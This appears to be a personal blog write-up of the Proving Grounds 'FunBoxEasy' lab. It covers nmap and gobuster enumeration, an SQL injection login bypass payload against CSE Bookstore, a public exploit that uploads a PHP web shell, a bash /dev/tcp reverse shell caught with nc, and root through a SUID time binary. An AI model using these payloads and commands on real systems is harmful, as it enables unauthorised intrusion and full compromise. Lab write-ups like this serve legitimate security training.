Proving Grounds >> FunBoxEasy

Table of Content
  • Target OS: Linux
  • Rated Difficulty: Easy

ENUM >> NMAP

# Nmap 7.92 scan initiated Tue Feb 15 15:16:09 2022 as: nmap -sS -v -sV -sC -oN nmap_initial 192.168.178.111
Nmap scan report for 192.168.178.111
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
|   256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_  256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry 
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 15 15:16:30 2022 -- 1 IP address (1 host up) scanned in 21.64 seconds

ENUM >> GoBuster scan

❯ gobuster dir -u http://192.168.178.111 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -x php,html,htm,js
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.178.111
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,htm,js
[+] Timeout:                 10s
===============================================================
2022/02/15 15:17:22 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 318] [--> http://192.168.178.111/admin/]
/dashboard.php        (Status: 302) [Size: 10272] [--> http://192.168.178.111/index.php]
/forgot-password.php  (Status: 200) [Size: 2763]
/header.php           (Status: 200) [Size: 1666]
/index.html           (Status: 200) [Size: 10918]
/index.php            (Status: 200) [Size: 3468]
/logout.php           (Status: 200) [Size: 75]
/profile.php          (Status: 302) [Size: 7247] [--> http://192.168.178.111/index.php]
/registration.php     (Status: 200) [Size: 9409]
/robots.txt           (Status: 200) [Size: 14]
/secret               (Status: 301) [Size: 319] [--> http://192.168.178.111/secret/]
/store                (Status: 301) [Size: 318] [--> http://192.168.178.111/store/]

===============================================================
2022/02/15 15:23:16 Finished
===============================================================

PRIVESC >> /store is CSE Bookstore

OK, I’ve done this dance before… Infact, it was part of the OWASP Top 10 room on TryHackMe… so without further ado (and notes from when I did that room on THM):

  • Immediately we are greeted with the name of this web application on the very first page (hence why I knew it would be our PrivEsc method as soon as I loaded this page):

  • Doing a search on searchsploit brings us the 3 below hits… I do like the sound of "Authentication Bypass"!
 ❯ searchsploit "CSE Bookstore"
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                                      | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                                                           | php/webapps/48960.txt
CSE Bookstore 1.0 - Multiple SQL Injection                                                          | php/webapps/49314.txt
---------------------------------------------------------------------------------------------------- --------------------------------
  • The text file was simple yet straight to the point…:
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909

CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel.
By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.

Payload:
Name: admin
Pass: %' or '1'='1
  • I went with option 1 for password, since it was literally 2 characters…:

  • And just like that, we got admin on the website! But, what next? Not much actually… but all is not lost:

  • Turns out, if we search for Online Book Store on exploit-db we get another exploit that might be worth a shot (and this is where I jumped straight to on this box, as I knew the previous steps were not required):

  • Downloading and running the exploit… we get a RCE $ prompt. Not being a fan of flimsy web shells, I quickly opted for a "bash reverse shell" upgrade:
❯ python3 47887.py http://192.168.178.111/store/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://192.168.178.111/store/bootstrap/img/13fLOMSeJW.php
> Example command usage: http://192.168.178.111/store/bootstrap/img/13fLOMSeJW.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ bash -c 'bash -i &>/dev/tcp/192.168.49.178/1337 <&1'
  • That’s better! 🙂
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.49.178] from (UNKNOWN) [192.168.178.111] 56036
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
www-data@funbox3:/var/www/html/store/bootstrap/img$

PRIVESC >> time is SUID

OK this box was as advertised… a quick look at the SUID binaries and we notice that /usr/bin/time has that special-sauce flag. The time app simply returns the time it took for a command to run when it either crashes or completes, so basically it’s a easy step into running whatever we wish as root… in this case /bin/sh -p will give us that # prompt that makes you feel all good inside. 😉

www-data@funbox3:/var/www/html/store/bootstrap/img$ /usr/bin/time /bin/sh -p
#


Leave a Reply

Your email address will not be published.